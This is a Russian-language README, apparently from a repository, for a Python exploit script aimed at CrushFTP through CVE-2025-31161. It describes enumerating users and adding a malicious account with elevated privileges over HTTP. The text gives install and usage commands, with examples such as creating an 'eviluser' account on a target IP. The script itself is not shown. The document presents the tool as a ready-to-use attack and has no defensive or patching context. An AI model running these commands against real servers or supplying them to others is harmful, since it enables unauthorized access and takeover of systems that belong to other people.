
Эксплойт-скрипт на Python для CVE-2025-31161, нацеленный на CrushFTP. Перечисляет пользователей и создаёт вредоносные учётные записи с повышенными привилегиями через HTTP-запросы.
Этот репозиторий содержит Python-скрипт для взаимодействия с сервисом CrushFTP, уязвимым к CVE-2025-31161. Скрипт позволяет перечислить существующих пользователей и добавить вредоносного пользователя, используя уязвимость.
requestspip install -r requirements.txt
python3 CVE-2025-31161.py listusers --ip <IP> --port <PORT>
python3 CVE-2025-31161.py adduser --ip <IP> --port <PORT> --valid_username <VALID_ADMIN> --username <NEW_USER> --password <PASSWORD>
python3 CVE-2025-31161.py listusers --ip 192.168.1.100 --port 80
python3 CVE-2025-31161.py adduser --ip 192.168.1.100 --port 8080 --username eviluser --password 1234